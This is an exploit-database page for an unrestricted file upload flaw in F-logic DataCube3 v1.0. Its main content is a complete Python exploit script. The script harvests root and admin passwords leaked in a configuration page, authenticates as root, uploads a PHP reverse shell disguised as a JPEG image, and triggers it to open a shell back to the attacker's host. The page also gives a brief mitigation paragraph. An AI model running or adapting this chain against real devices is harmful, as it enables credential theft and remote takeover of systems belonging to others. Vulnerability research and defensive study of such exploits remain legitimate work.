header-logo
Suggest Exploit
vendor:
DataCube3
by:
Samy Younsi
6.1
CVSS
HIGH
Unrestricted File Upload, Remote Code Execution
434
CWE
Product Name: DataCube3
Affected Version From: 1
Affected Version To: 1
Patch Exists: NO
Related CWE: CVE-2024-25830, CVE-2024-25832
CPE: a:f-logic:datacube3:1.0
Metasploit:
Other Scripts:
Platforms Tested: Ubuntu
2022

DataCube3 v1.0 – Unrestricted File Upload Remote Code Execution

The DataCube3 v1.0 software is vulnerable to an unrestricted file upload vulnerability that can lead to remote code execution. An attacker can exploit this to upload malicious files to the server, potentially allowing them to execute arbitrary commands. This exploit also includes a reverse shell chain and information disclosure, such as leaking root passwords.

Mitigation:

To mitigate this vulnerability, it is recommended to restrict file upload capabilities to only allow authorized file types and sizes. Additionally, regularly updating the software and implementing proper access controls can help prevent such exploits.
Source

Exploit-DB raw data:

# Exploit Title: DataCube3 v1.0 - Unrestricted file upload 'RCE'
# Date: 7/28/2022
# Exploit Author: Samy Younsi - NS Labs (https://neroteam.com)
# Vendor Homepage: https://www.f-logic.jp
# Software Link: https://www.f-logic.jp/pdf/support/manual_product/manual_product_datacube3_ver1.0_sc.pdf
# Version: Ver1.0
# Tested on: DataCube3 version 1.0 (Ubuntu)
# CVE : CVE-2024-25830 + CVE-2024-25832

# Exploit chain reverse shell, information disclosure (root password leak) + unrestricted file upload

from __future__ import print_function, unicode_literals
from bs4 import BeautifulSoup
import argparse
import requests
import json
import urllib3
import re
urllib3.disable_warnings()

def banner():
  dataCube3Logo = """ 
        ▒▒▒▒▒▒████████████████████████████████████▓▓▓▓▓▓▓▓
      ▒▒▒▒▒▒▒▒██        DataCube3   Ver1.0      █F-logic▓▓
      ▒▒████▒▒██        ████        ████        ██▓▓▓▓▓▓▓▓
      ▒▒████▒▒██        ████        ████        ██▓▓▓▓▓▓▓▓
      ▒▒▒▒▒▒▒▒██        ████        ████        ██▓▓▓▓▓▓▓▓
      ▒▒▒▒▒▒▒▒██                                ██▓▓████▓▓
      ▒▒▒▒▒▒▒▒██        ██             ██       ██▓▓████▓▓
      ▒▒▒▒▒▒▒▒██        █████████████████       ██▓▓▓▓▓▓▓▓
        ▒▒▒▒▒▒████████████████████████████████████▓▓▓▓▓▓                                       
                                                                                 
\033[1;92mSamy Younsi (Necrum Security Labs)\033[1;m         \033[1;91mDataCube3 exploit chain reverse shell\033[1;m                                                 
                FOR EDUCATIONAL PURPOSE ONLY.   
  """
  return print('\033[1;94m{}\033[1;m'.format(dataCube3Logo))


def extractRootPwd(RHOST, RPORT, protocol):
  url = '{}://{}:{}/admin/config_all.php'.format(protocol, RHOST, RPORT)
  try:
    response = requests.get(url, allow_redirects=False, verify=False, timeout=20)
    if response.status_code != 302:
      print('[!] \033[1;91mError: DataCube3 web interface is not reachable. Make sure the specified IP is correct.\033[1;m')
      exit()
    soup = BeautifulSoup(response.content.decode('utf-8'), 'html.parser')
    scriptTag = str(soup.find_all('script')[12]).replace(' ', '')
    rawLeakedData = re.findall('configData:.*,', scriptTag)[0]
    jsonLeakedData = json.loads('[{}]'.format(rawLeakedData.split('configData:[')[1].split('],')[0]))
    adminPassword = jsonLeakedData[12]['value']
    rootPassword = jsonLeakedData[14]['value']
    print('[INFO] DataCube3 leaked credentials successfully extracted: admin:{} | root:{}.\n[INFO] The target must be vulnerable.'.format(adminPassword, rootPassword))
    return rootPassword
  except:
    print('[ERROR] Can\'t grab the DataCube3 version...')


def generateAuthCookie(RHOST, RPORT, protocol, rootPassword):
  print('[INFO] Generating DataCube3 auth cookie ...')
  url = '{}://{}:{}/admin/config_all.php'.format(protocol, RHOST, RPORT)
  data = {
    'user_id': 'root',
    'user_pw': rootPassword,
    'login': '%E3%83%AD%E3%82%B0%E3%82%A4%E3%83%B3'
  }
  try:
    response = requests.post(url, data=data, allow_redirects=False, verify=False, timeout=20)
    if response.status_code != 302:
      print('[!] \033[1;91mError: An error occur while trying to get the auth cookie, is the root password correct?\033[1;m')
      exit()
    authCookie = response.cookies.get_dict() 
    print('[INFO] Authentication successful! Auth Cookie: {}'.format(authCookie))  
    return authCookie
  except:
    print('[ERROR] Can\'t grab the auth cookie, is the root password correct?')


def extractAccesstime(RHOST, RPORT, LHOST, LPORT, protocol, authCookie):
  print('[INFO] Extracting Accesstime ...')
  url = '{}://{}:{}/admin/setting_photo.php'.format(protocol, RHOST, RPORT)
  try:
    response = requests.get(url, cookies=authCookie, allow_redirects=False, verify=False, timeout=20)
    if response.status_code != 302:
      print('[!] \033[1;91mError: An error occur while trying to get the accesstime value.\033[1;m')
      exit()
    soup = BeautifulSoup(response.content.decode('utf-8'), 'html.parser')
    accessTime = soup.find('input', {'name': 'accesstime'}).get('value')
    print('[INFO] AccessTime value: {}'.format(accessTime))
    return accessTime
  except:
    print('[ERROR] Can\'t grab the accesstime value, is the root password correct?')


def injectReverseShell(RHOST, RPORT, LHOST, LPORT, protocol, authCookie, accessTime):
  print('[INFO] Injecting PHP reverse shell script ...')
  filename='rvs.php'
  payload = '<?php $sock=fsockopen("{}",{});$proc=proc_open("sh", array(0=>$sock, 1=>$sock, 2=>$sock),$pipes);?>'.format(LHOST, LPORT)

  data = '-----------------------------113389720123090127612523184396\r\nContent-Disposition: form-data; name="add"\r\n\r\nå��ç��追å�\xA0\r\n-----------------------------113389720123090127612523184396\r\nContent-Disposition: form-data; name="addPhoto"; filename="{}"\r\nContent-Type: image/jpeg\r\n\r\n{}\r\n-----------------------------113389720123090127612523184396\r\nContent-Disposition: form-data; name="accesstime"\r\n\r\n{}\r\n-----------------------------113389720123090127612523184396--\r\n'.format(filename, payload, accessTime)

  headers = {
      'Content-Type': 'multipart/form-data; boundary=---------------------------113389720123090127612523184396'
  }
  url = '{}://{}:{}/admin/setting_photo.php'.format(protocol, RHOST, RPORT)
  try:
    response = requests.post(url, cookies=authCookie, headers=headers, data=data, allow_redirects=False, verify=False, timeout=20)
    if response.status_code != 302:
        print('[!] \033[1;91mError: An error occur while trying to upload the PHP reverse shell script.\033[1;m')
        exit()
    shellURL = '{}://{}:{}/images/slideshow/{}'.format(protocol, RHOST, RPORT, filename)
    print('[INFO] PHP reverse shell script successfully uploaded!\n[INFO] SHELL URL: {}'.format(shellURL))
    return shellURL
  except:
    print('[ERROR] Can\'t upload the PHP reverse shell script, is the root password correct?')


def execReverseShell(shellURL):
  print('[INFO] Executing reverse shell...')
  try:
    response = requests.get(shellURL, allow_redirects=False, verify=False)
    print('[INFO] Reverse shell successfully executed.')
    return
  except Exception as e:
      print('[ERROR] Reverse shell failed. Make sure the DataCube3 device can reach the host {}:{}')
      return False


def main():
  banner()
  args = parser.parse_args()
  protocol = 'https' if args.RPORT == 443 else 'http'
  rootPassword = extractRootPwd(args.RHOST, args.RPORT, protocol)
  authCookie = generateAuthCookie(args.RHOST, args.RPORT, protocol, rootPassword)
  accessTime = extractAccesstime(args.RHOST, args.RPORT, args.LHOST, args.LPORT, protocol, authCookie)
  shellURL = injectReverseShell(args.RHOST, args.RPORT, args.LHOST, args.LPORT, protocol, authCookie, accessTime)
  execReverseShell(shellURL)


if __name__ == '__main__':
  parser = argparse.ArgumentParser(description='Script PoC that exploit an unauthenticated remote command injection on f-logic DataCube3 devices.', add_help=False)
  parser.add_argument('--RHOST', help='Refers to the IP of the target machine. (f-logic DataCube3 device)', type=str, required=True)
  parser.add_argument('--RPORT', help='Refers to the open port of the target machine. (443 by default)', type=int, required=True)
  parser.add_argument('--LHOST', help='Refers to the IP of your machine.', type=str, required=True)
  parser.add_argument('--LPORT', help='Refers to the open port of your machine.', type=int, required=True)
  main()
cqrsecured